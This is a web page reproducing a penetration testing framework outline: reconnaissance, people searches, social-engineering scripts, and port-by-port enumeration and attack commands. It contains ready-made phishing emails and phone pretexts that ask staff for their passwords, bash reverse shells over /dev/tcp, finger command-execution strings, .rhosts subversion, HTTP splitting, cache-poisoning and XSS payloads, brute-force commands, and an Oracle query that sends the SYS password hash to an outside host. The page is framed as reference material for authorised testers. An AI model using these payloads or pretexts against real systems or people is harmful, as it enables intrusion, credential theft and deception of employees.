Free Seminars

Keep an eye here, or register to be informed of OUR FREE events ...

Read more


Step by Step guide’s or How to documentations can be found here...

Read more

Our Sponsors

Better Together User Group,info & sponsors

Read more

About Erdal Ozkaya

Who is Erdal Ozkaya?
To learn more about him, click here...

Read more

Video Tutorial

Watch and learn the easy way...

Read more

Penetration Testing Framework 0.58

This post will have nearly everything what you need to have for Penetration Testing



    • Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.


      • full-1



Whois is widely used for querying authoritative registries/ databases to discover the owner of a domain name, an IP address, or an autonomous system number of the system you are targeting.



        • Authoratitive Bodies





          • RIR - Regional Internet Registry




              • National Internet Registry











        • Websites



            • Domain Dossier


            • Email Dossier



            • Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.



            • Autonomous System lookups and other online tools available.




            • Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.



            • Metasearch engine that visually presents its results.



            • Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution



            • Excellent site that can be used if the above is down




            • Online search tool allowing queries for host information.



            • Finds shared domains based on supplied IP addresses


            • Note: - Website utilised by nmap hostmap.nse script



            • Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.


            • Note: - Can be unreliable with old entries (Use CentralOps to verify)



            • Website listing a large number links to online traceroute resources.



            • Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.



        • Tools





          • Firefox Plugins













      • full-2



Internet Search



        • General Information






        • Financial







        • Phone book/ Electoral Role Information






            • Electoral Role Search. UK



            • Online White Pages and Yellow Pages. US


          • Abika



User Link



            • Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US


          • UK




















            • People Search Engine. US


        • Generic Web Searching



          • Forum Entries



          • Google


            • Back end files


              • .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf


            • Email Addresses


            • Contact Details


          • Newsgroups/forums


          • Blog Search












          • Search Engine Comparison/ Aggregator Sites

















        • Metadata Search


          • Metadata can be found within various file formats. Dependant on the file types to be inspected, the more metadata can be extracted. Example metadata that can be extracted includes valid usernames, directory structures etc. make the review of documents/ images etc. relating to the target domain a valuable source of information.


            • MetaData Visualisation Sites




            • Tools



                • svn checkout


                • cat filename | strings | bashitsu-extract-names




                • exiftool -common directory


                • exiftool -r -w .txt -common directory


              • FOCA







                • extract -b filename


                • extract filename


                • extract -B country_code filename



                • extract.bat <arg1> <arg2> <arg3>



                • metagoofil -d target_domain -l max_no_of_files -f all ( or pdf,doc,xls,ppt) -o output_file.html -t directory_to_download_files_to




                • ./therev '' @/directory


                • ./therev ''


                • ./therev 'linux' en



            • Wikipedia Metadata Search




        • Social/ Business Networks


          • The following sites are some of many social and business related networking entities that are in use today. Dependant on the interests of the people you are researching it may be worth just exploring sites that they have a particular penchant based on prior knowledge from open source research, company biographies etc. i.e. Buzznet if they are interested in music/ pop culture, Flixter for movies etc.



Finding a persons particular interests may make a potential client side attack more successful if you can find a related "hook" in any potential "spoofed" email sent for them to click on (A Spearphishing technique)


Note: - This list is not exhaustive and has been limited to those with over 1 million members.



            • Africa



            • Australia



            • Belgium



            • Holland



            • Hungary



            • Iran



            • Japan



            • Korea



            • Poland




            • Russia




            • Sweden



            • UK





            • US








            • Assorted



















        • Resources




      • full-3



DNS Record Retrieval from publically available servers



        • Types of Information Records


          • SOA Records - Indicates the server that has authority for the domain.


          • MX Records - List of a host’s or domain’s mail exchanger server(s).


          • NS Records - List of a host’s or domain’s name server(s).


          • A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.


          • PTR Records - Lists a host’s domain name, host identified by its IP address.


          • SRV Records - Service location record.


          • HINFO Records - Host information record with CPU type and operating system.


          • TXT Records - Generic text record.


          • CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.


          • RP - Responsible person for the domain.


        • Database Settings


          • Version.bind


          • Serial


          • Refresh


          • Retry


          • Expiry


          • Minimum


        • Sub Domains


        • Internal IP ranges


          • Reverse DNS for IP Range


        • Zone Transfer


      • full-5



Social Engineering



        • Remote


          • Phone


            • Scenarios


              • IT Department."Hi, it's Zoe from the helpdesk. I am doing a security audit of the networkand I need to re-synchronise the Active Directory usernames and passwords.This is so that your logon process in the morning receives no undue delays"If you are calling from a mobile number, explain that the helpdesk has beenissued a mobile phone for 'on call' personnel.


            • Results


            • Contact Details


              • Name


              • Phone number


              • Email


              • Room number


              • Department


              • Role


          • Email


            • Scenarios


              • Hi there, I am currently carrying out an Active Directory Health Checkfor TARGET COMPANY and require to re-synchronise some outstandingaccounts on behalf of the IT Service Desk. Please reply to medetailing the username and password you use to logon to your desktopin the morning. I have checked with MR JOHN DOE, the IT SecurityAdvisor and he has authorised this request. I will then populate thedatabase with your account details ready for re-synchronisation withActive Directory such that replication of your account will bere-established (this process is transparent to the user and sorequires no further action from yourself). We hope that this exercisewill reduce the time it takes for some users to logon to the network.Best Regards, Andrew Marks


              • Good Morning,The IT Department had a critical failure last night regarding remote access to the corporate network, this will only affect users that occasionally work from home.If you have remote access, please email me with your username and access requirements e.g. what remote access system did you use? VPN and IP address etc, and we will reset the system. We are also using this 'opportunity' to increase the remote access users, so if you believe you need to work from home occasionally, please email me your usernames so I can add them to the correct groups.If you wish to retain your current credentials, also send your password. We do not require your password to carry out the maintainence, but it will change if you do not inform us of it.We apologise for any inconvenience this failure has caused and are working to resolve it as soon as possible. We also thank you for your continued patience and help.Kindest regards,leeEMAIL SIGNATURE


            • Software


            • Results


            • Contact Details


              • Name


              • Phone number


              • Email


              • Room number


              • Department


              • Role


          • Other


        • Local


          • Personas


            • Name


              • Suggest same 1st name.


            • Phone


              • Give work mobile, but remember they have it!


            • Email


              • Have a suitable email address


            • Business Cards


              • Get cards printed


          • Contact Details


            • Name


            • Phone number


            • Email


            • Room number


            • Department


            • Role


          • Scenarios


            • New IT employee


              • New IT employee."Hi, I'm the new guy in IT and I've been told to do a quick survey of users on the network. They give all the worst jobs to the new guys don't they? Can you help me out on this?"Get the following information, try to put a "any problems with it we can help with?" slant on it.UsernameDomainRemote access (Type - Modem/VPN)Remote email (OWA)Most used software?Any comments about the network?Any additional software you would like?What do you think about the security on the network? Password complexity etc.Now give reasons as to why they have complexity for passwords, try and get someone to give you their password and explain how you can make it more secure."Thanks very much and you'll see the results on the company boards soon."


            • Fire Inspector


              • Turning up on the premise of a snap fire inspection, in line with the local government initiatives on fire safety in the workplace.Ensure you have a suitable appearance - High visibility jacket - Clipboard - ID card (fake).Check for:number of fire extinguishers, pressure, type.Fire exits, accessibility etc.Look for any information you can get. Try to get on your own, without supervision!


          • Results


          • Maps


            • Satalitte Imagery


              • Google Maps


            • Building layouts


          • Other


      • full-6



Dumpster Diving



        • Rubbish Bins


        • Contract Waste Removal


        • Ebay ex-stock sales i.e. HDD


      • full-7



Web Site copy






    • Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.


      • Default Port Lists




      • Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific


        • General Enumeration Tools



            • nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml


            • nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results


            • nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results


            • nmap -A -sS -PN -n --script:all ip_address --reason


            • grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list



            • nc -v -n IP_Address port


            • nc -v -w 2 -z IP_Address port_range/port_number



            • amap -bqv 80


            • amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]



            • xprobe2



            • ./ -i -p



            • nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)



Arrow Link




            • hping ip_address



            • scanrand ip_address:all



            • unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E



            • netenum network/netmask timeout



            • fping -a -d hostname/ (Network/Subnet_Mask)


        • Firewall Specific Tools



            • firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]



            • host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log





























      • Active Hosts


        • Open TCP Ports


        • Closed TCP Ports


        • Open UDP Ports


        • Closed UDP Ports


        • Service Probing


          • SMTP Mail Bouncing


          • Banner Grabbing


            • Other


            • HTTP


              • Commands


                • JUNK / HTTP/1.0


                • HEAD / HTTP/9.3


                • OPTIONS / HTTP/1.0


                • HEAD / HTTP/1.0


              • Extensions


                • WebDAV


                • ASP.NET


                • Frontpage


                • OWA


                • IIS ISAPI


                • PHP


                • OpenSSL


            • HTTPS


              • Use stunnel to encapsulate traffic.


            • SMTP


            • POP3


            • FTP


              • If banner altered, attempt anon logon and execute: 'quote help' and 'syst' commands.


        • ICMP Responses


          • Type 3 (Port Unreachable)


          • Type 8 (Echo Request)


          • Type 13 (Timestamp Request)


          • Type 15 (Information Request)


          • Type 17 (Subnet Address Mask Request)


          • Responses from broadcast address


        • Source Port Scans


          • TCP/UDP 53 (DNS)


          • TCP 20 (FTP Data)


          • TCP 80 (HTTP)


          • TCP/UDP 88 (Kerberos)


        • Firewall Assessment


          • Firewalk


          • TCP/UDP/ICMP responses


        • OS Fingerprint


    • Enumeration


      • Daytime port 13 open


        • nmap nse script



      • FTP port 21 open


        • full-1



Fingerprint server



          • telnet ip_address 21 (Banner grab)


          • Run command ftp ip_address


          • This email address is being protected from spambots. You need JavaScript enabled to view it.


          • Check for anonymous access


            • ftp ip_addressUsername: anonymous OR anonPassword: This email address is being protected from spambots. You need JavaScript enabled to view it.


        • full-2



Password guessing






        • full-3



Examine configuration files



          • ftpusers


          • ftp.conf


          • proftpd.conf


        • MiTM



      • SSH port 22 open


        • full-1



Fingerprint server



          • full-1



telnet ip_address 22 (banner grab)



          • full-2



scanssh User Link



            • scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask


        • full-2



Password guessing



          • full-1



ssh root@ip_address



          • full-2



guess-who User Link



            • ./b -l username -h ip_address -p 22 -2 < password_file_location


          • full-3



Hydra brute force User Link



          • full-4



brutessh User Link



          • full-5



Ruby SSH Bruteforcer User Link



        • full-3



Examine configuration files



          • ssh_config


          • sshd_config


          • authorized_keys


          • ssh_known_hosts


          • .shosts


        • full-5



SSH Client programs







      • Telnet port 23 open


        • full-1



Fingerprint server



          • full-1



telnet ip_address



            • Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster


          • full-2



telnetfp User Link



        • full-2



Password Attack



          • full-1



Common passwords


User Link



          • full-2



Hydra brute force User Link



          • full-3



Brutus User Link



          • telnet -l "-froot" hostname (Solaris 10+)


        • full-3



Examine configuration files



          • /etc/inetd.conf


          • /etc/xinetd.d/telnet


          • /etc/xinetd.d/stelnet


      • Sendmail Port 25 open


        • full-1



Fingerprint server



          • telnet ip_address 25 (banner grab)


        • full-2



Mail Server Testing



          • Enumerate users


            • VRFY username (verifies if username exists - enumeration of accounts)


            • EXPN username (verifies if username is valid - enumeration of accounts)


          • Mail Spoof Test


            • HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT


          • Mail Relay Test


            • HELO anything


              • Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>


              • Unknown domain - mail from: <user@unknown_domain>


              • Domain not present - mail from: <user@localhost>


              • Domain not supplied - mail from: <user>


              • Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>


              • Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>


              • Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">


              • User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>


              • Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>


              • Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>


        • full-3



Examine Configuration Files







      • DNS port 53 open


        • full-1



Fingerprint server/ service



          • host


            • host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.


          • nslookup


            • nslookup [ -option ... ] [ host-to-find | - [ server ]]


          • dig


            • dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]


          • whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup


        • full-2



DNS Enumeration




            • perl [website] [project_name]


            • perl [website] [input file]


            • perl [input file] [true domain file] [output file] <range>


            • perl [input file] [true domain file] [output file]


            • perl [input file] [output file]


            • perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]


            • perl [ip_address_file] [output_file]


            • perl jarf-rev [subnetblock] [nameserver]



            • txdns -rt -t domain_name


            • txdns -x 50 -bb domain_name


            • txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt


          • nmap nse scripts






        • full-3



Examine Configuration Files



          • host.conf


          • resolv.conf


          • named.conf


      • TFTP port 69 open


        • full-1



TFTP Enumeration



          • tftp ip_address PUT local_file


          • tftp ip_address GET conf.txt (or other files)


          • Solarwinds TFTP server


          • tftp – i <IP> GET /etc/passwd (old Solaris)


        • full-2



TFTP Bruteforcing





      • Finger Port 79 open


        • full-1



User enumeration



          • finger 'a b c d e f g h'


          • finger This email address is being protected from spambots. You need JavaScript enabled to view it.


          • finger This email address is being protected from spambots. You need JavaScript enabled to view it.


          • finger This email address is being protected from spambots. You need JavaScript enabled to view it.


          • finger This email address is being protected from spambots. You need JavaScript enabled to view it.


          • finger **


          • finger This email address is being protected from spambots. You need JavaScript enabled to view it.


          • finger


          • nmap nse script



        • full-2



Command execution



          • finger "|/bin/This email address is being protected from spambots. You need JavaScript enabled to view it."


          • finger "|/bin/ls -a /"


        • full-3



Finger Bounce



          • finger user@host@victim


          • finger @internal@external


      • Web Ports 80,8080 etc. open


        • full-1



Fingerprint server



          • Telnet ip_address port


          • Firefox plugins


            • All



            • Specific








        • full-2



Crawl website



          • lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source




            • -d [domain] -l [no. of] -f [type] -o results.html


        • full-3



Web Directory enumeration




            • nikto [-h target] [options]





        • full-4



Vulnerability Assessment



          • Manual Tests



            • Install Backdoors


              • ASP




              • Assorted






              • Perl








              • PHP








              • Python




              • TCL




              • Bash Connect Back Shell



                  • Atttack Box: nc -l -p Port -vvv


                  • Victim: $ exec 5<>/dev/tcp/IP_Address/Port



Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done




                  • Atttack Box: nc -l -p Port -vvv


                  • Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin



Victim: $ exec 1>&0 # Next we copy stdin to stdout


Victim: $ exec 2>&0 # And finally stdin to stderr


Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0



            • Method Testing


              • nc IP_Adress Port


                • HEAD / HTTP/1.0


                • OPTIONS / HTTP/1.0


                • PROPFIND / HTTP/1.0


                • TRACE / HTTP/1.1


                • PUT http://Target_URL/FILE_NAME


                • POST http://Target_URL/FILE_NAME HTTP/1.x


            • Upload Files


              • curl


                • curl -u <username:password> -T file_to_upload <Target_URL>


                • curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>



                • -h target -r /remote_file_name -f local_file_name


              • webdav



            • View Page Source


              • Hidden Values


              • Developer Remarks


              • Extraneous Code


              • Passwords!



              • NULL or null


                • Possible error messages returned.


              • ' , " , ; , <!


                • Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.


              • – , = , + , "


                • Used to craft SQL Injection queries.


              • ‘ , &, ! , ¦ , < , >


                • Used to find command execution vulnerabilities.


              • "><script>alert(1)</script>


                • Basic Cross-Site Scripting Checks.


              • %0d%0a


                • Carriage Return (%0d) Line Feed (%0a)


                  • HTTP Splitting


                    • language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>



  1. i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>



                  • Cache Poisoning


                    • language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>


              • %7f , %ff


                • byte-length overflows; maximum 7- and 8-bit values.


              • -1, other


                • Integer and underflow vulnerabilities.


              • %n , %x , %s


                • Testing for format string vulnerabilities.


              • ../


                • Directory Traversal Vulnerabilities.


              • % , _, *


                • Wildcard characters can sometimes present DoS issues or information disclosure.


              • Ax1024+


                • Overflow vulnerabilities.


            • Automated table and column iteration



                • ./



                • ./,COLUMN,3+FROM+TABLE--


          • Vulnerability Scanners







          • Specific Applications/ Server Tools


            • Domino



                • [options] -h <IP>


            • Joomla



                • ./ <site-name>



                • ./ <IP>



                • ./ <site> <options> [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don't show 404 responses]



                • ./ -u "" -o site.txt -p



                • -f hostname


                • (shell.txt required)



              • http://target/app/filename.aspx (options i.e. -bf)


            • Vbulletin



                • <host> <port> -v


                • -update


            • ZyXel



              • snmpwalk


                • snmpwalk -v2c -c public IP_Address


              • snmpget


                • snmpget -v2c -c public IP_Address


        • full-5



Proxy Testing










        • full-6



Examine configuration files



          • Generic


            • Examine httpd.conf/ windows config files



            • JMX Console http://<IP>:8080/jmxconcole/



          • Joomla


            • configuration.php


            • diagnostics.php






          • Mambo


            • configuration.php




          • Wordpress


            • setup-config.php


            • wp-config.php



            • /WAN.html (contains PPPoE ISP password)


            • /WLAN_General.html and /WLAN.html (contains WEP key)


            • /rpDyDNS.html (contains DDNS credentials)


            • /Firewall_DefPolicy.html (Firewall)


            • /CF_Keyword.html (Content Filter)


            • /RemMagWWW.html (Remote MGMT)


            • /rpSysAdmin.html (System)


            • /LAN_IP.html (LAN)


            • /NAT_General.html (NAT)


            • /ViewLog.html (Logs)


            • /rpFWUpload.html (Tools)


            • /DiagGeneral.html (Diagnostic)


            • /RemMagSNMP.html (SNMP Passwords)


            • /LAN_ClientList.html (Current DHCP Leases)


            • Config Backups


              • /RestoreCfg.html


              • /BackupCfg.html


              • Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings



        • full-7



Examine web server logs



          • c:\winnt\system32\Logfiles\W3SVC1


            • awk -F " " '{print $3,$11} filename | sort | uniq


        • References


          • White Papers








          • Books





        • Exploit Frameworks


          • Brute-force Tools





      • Portmapper port 111 open



          • username:password@IP_Address port/protocol (i.e. 80/HTTP)


        • rpcinfo


          • rpcinfo [options] IP_Address


      • NTP Port 123 open


        • full-1



NTP Enumeration



          • full-1



ntpdc -c monlist IP_ADDRESS



          • full-2



ntpdc -c sysinfo IP_ADDRESS



          • full-3






            • host


            • hostname


            • ntpversion


            • readlist


            • version


        • full-2



Examine configuration files



          • ntp.conf


        • full-3



nmap nse script




      • NetBIOS Ports 135-139,445 open


        • full-1



NetBIOS enumeration




            • enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>


          • Null Session


            • net use \\\ipc$ "" /u:""


              • net view \\ip_address



          • Smbclient


            • smbclient -L //server/share password options



            • Enumeration tab.




        • full-2



NetBIOS brute force








        • full-3



Examine Configuration Files



          • Smb.conf


          • lmhosts


      • SNMP port 161 open


        • full-1



Default Community Strings



          • public


          • private


          • cisco


            • cable-docsis


            • ILMI


        • full-2



MIB enumeration



          • Windows NT


            • . Hostnames


            • . Domain Name


            • . Usernames


            • . Running Services


            • . Share Information




          • snmpwalk


            • snmpwalk -v <Version> -c <Community string> <IP>



          • Applications


            • ZyXel


              • snmpget -v2c -c <Community String> <IP>


              • snmpwalk -v2c -c <Community String> <IP>


          • nmap nse script



        • full-3



SNMP Bruteforce



          • onesixtyone


            • onesixytone -c SNMP.wordlist <IP>


          • cat


            • ./cat -h <IP> -w SNMP.wordlist




          • nmap nse script



        • full-4



Examine SNMP Configuration files



          • snmp.conf


          • snmpd.conf


          • snmp-config.xml


      • LDAP Port 389 Open


        • full-1



ldap enumeration




            • ldapminer -h ip_address -p port (not required if default) -d



            • Gui based tool



            • Gui based tool



            • ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]


            • ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]


            • ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]


            • ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]


            • ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]


        • full-2



ldap brute force




            • bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)




        • full-3



Examine Configuration Files



          • General


            • containers.ldif


            • ldap.cfg


            • ldap.conf


            • ldap.xml


            • ldap-config.xml


            • ldap-realm.xml


            • slapd.conf


          • IBM SecureWay V3 server




          • Microsoft Active Directory server


            • msadClassesAttrs.ldif


          • Netscape Directory Server 4


            • nsslapd.sas_at.conf


            • nsslapd.sas_oc.conf


          • OpenLDAP directory server


            • slapd.sas_at.conf


            • slapd.sas_oc.conf


          • Sun ONE Directory Server 5.1


            • 75sas.ldif


      • PPTP/L2TP/VPN port 500/1723 open


        • Enumeration




        • Brute-Force



        • Reference Material





      • Modbus port 502 open



      • rlogin port 513 open


        • Rlogin Enumeration


          • Find the files


            • find / -name .rhosts


            • locate .rhosts


          • Examine Files


            • cat .rhosts


          • Manual Login


            • rlogin hostname -l username


            • rlogin <IP>


          • Subvert the files


            • echo ++ > .rhosts


        • Rlogin Brute force



      • rsh port 514 open


        • full-1



Rsh Enumeration



          • rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command


        • full-2



Rsh Brute Force






      • SQL Server Port 1433 1434 open


        • full-1



SQL Enumeration





            • sqlping ip_address/hostname







        • full-2



SQL Brute Force




            • sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack


            • sqlbf -u hashes.txt -c -r out.rep - Brute-Force Attack







      • Citrix port 1494 open


        • full-1



Citrix Enumeration



          • Default Domain


          • Published Applications




        • full-2



Citrix Brute Force






          • Reference Material




      • Oracle Port 1521 Open


        • full-1



Oracle Enumeration










            • SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;





            • tnsver host [port]




            • Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]